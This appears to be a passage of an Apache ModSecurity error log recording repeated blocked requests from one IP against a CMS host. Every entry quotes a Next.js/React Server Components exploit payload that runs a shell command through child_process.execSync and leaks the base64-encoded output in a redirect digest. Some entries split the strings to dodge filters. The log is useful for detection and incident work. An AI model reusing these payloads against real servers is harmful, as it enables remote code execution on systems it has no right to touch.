2026] [:error] [pid 12371:tid 12382] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qqen=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _bunt=Buffer.from(_qqen).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_bunt};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZoDC_XFy7BeiaQMHVgokQAAAAk"] [Sat Feb 21 21:10:03.732937 2026] [:error] [pid 12371:tid 12380] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qsrn=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _mgtf=Buffer.from(_qsrn).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_mgtf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZoDC_XFy7BeiaQMHVgokgAAAAc"] [Sat Feb 21 21:10:03.742480 2026] [:error] [pid 12371:tid 12378] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _wlia=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jglo=Buffer.from(_wlia).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jglo};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgokwAAAAU"] [Sat Feb 21 21:10:03.751039 2026] [:error] [pid 12371:tid 12395] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _knbm=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _ords=Buffer.from(_knbm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ords};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgolAAAABY"] [Sat Feb 21 21:10:03.760462 2026] [:error] [pid 12371:tid 12381] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _uayv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _jdyi=Buffer.from(_uayv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_jdyi};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZoDC_XFy7BeiaQMHVgolQAAAAg"] [Sat Feb 21 21:10:03.770329 2026] [:error] [pid 12371:tid 12389] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _srkv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _sccr=Buffer.from(_srkv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_sccr};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZoDC_XFy7BeiaQMHVgolgAAABA"] [Sat Feb 21 21:10:03.779321 2026] [:error] [pid 12371:tid 12392] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _cmms=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _azpk=Buffer.from(_cmms).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_azpk};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZoDC_XFy7BeiaQMHVgolwAAABM"] [Sat Feb 21 21:10:03.789052 2026] [:error] [pid 12371:tid 12396] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _iwqm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ucck=Buffer.from(_iwqm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ucck};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZoDC_XFy7BeiaQMHVgomAAAABc"] [Sat Feb 21 21:10:03.798181 2026] [:error] [pid 12371:tid 12374] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _fsoy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ojvq=Buffer.from(_fsoy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ojvq};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgomQAAAAE"] [Sat Feb 21 21:10:03.806444 2026] [:error] [pid 12371:tid 12383] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _vgpo=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _oiuc=Buffer.from(_vgpo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_oiuc};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgomgAAAAo"] [Sat Feb 21 21:10:03.814940 2026] [:error] [pid 12371:tid 12394] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ouva=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _amna=Buffer.from(_ouva).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_amna};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZoDC_XFy7BeiaQMHVgomwAAABU"] [Sat Feb 21 21:10:03.823766 2026] [:error] [pid 12371:tid 12385] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _ntsm=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _axlf=Buffer.from(_ntsm).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_axlf};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZoDC_XFy7BeiaQMHVgonAAAAAw"] [Sat Feb 21 21:10:03.832778 2026] [:error] [pid 12371:tid 12376] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _pbmj=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _edqy=Buffer.from(_pbmj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_edqy};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZoDC_XFy7BeiaQMHVgonQAAAAM"] [Sat Feb 21 21:10:03.843139 2026] [:error] [pid 12371:tid 12375] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _oyut=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _wsad=Buffer.from(_oyut).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_wsad};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/_next/"] [unique_id "aZoDC_XFy7BeiaQMHVgongAAAAI"] [Sat Feb 21 21:10:03.855148 2026] [:error] [pid 12371:tid 12391] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _tihv=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _pkop=Buffer.from(_tihv).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_pkop};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgonwAAABI"] [Sat Feb 21 21:10:03.866486 2026] [:error] [pid 12371:tid 12373] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _thvj=process['main' 'Module']['req' 'uire']('chi' 'ld_pro' 'cess')['exec' 'Sync'](Buffer.from('aWQ=','base64').toString()).toString().trim();var _qlon=Buffer.from(_thvj).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_qlon};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/"] [unique_id "aZoDC_XFy7BeiaQMHVgooAAAAAA"] [Sat Feb 21 21:10:03.879287 2026] [:error] [pid 12371:tid 12387] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _mqdx=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _rjwa=Buffer.from(_mqdx).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_rjwa};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/en/"] [unique_id "aZoDC_XFy7BeiaQMHVgooQAAAA4"] [Sat Feb 21 21:10:03.890455 2026] [:error] [pid 12371:tid 12377] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _qwbs=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _xtki=Buffer.from(_qwbs).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_xtki};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/app/"] [unique_id "aZoDC_XFy7BeiaQMHVgoogAAAAQ"] [Sat Feb 21 21:10:03.903307 2026] [:error] [pid 12371:tid 12379] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _weeo=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _dxoa=Buffer.from(_weeo).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_dxoa};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri "/api/"] [unique_id "aZoDC_XFy7BeiaQMHVgoowAAAAY"] [Sat Feb 21 21:10:03.913355 2026] [:error] [pid 12371:tid 12390] [client 23.180.120.131:39224] [client 23.180.120.131] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:0. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: trim( found within ARGS:0: {\\x22_response\\x22:{\\x22_chunks\\x22:\\x22$Q2\\x22,\\x22_formData\\x22:{\\x22get\\x22:\\x22$1:constructor:constructor\\x22},\\x22_prefix\\x22:\\x22var _jvuy=process.mainModule.require('child_process').execSync(Buffer.from('aWQ=','base64').toString()).toString().trim();var _ncfm=Buffer.from(_jvuy).toString('base64');throw Object.assign(new Error('NEXT_REDIRECT'),{digest:`NEXT_REDIRECT;push;/login?a=${_ncfm};307;`});\\x22},\\x22reason\\x22:-1,\\x22status\\x22:\\x22resolved_model\\x22,..."] [sever [hostname "cms-1.dev-unit.com"] [uri 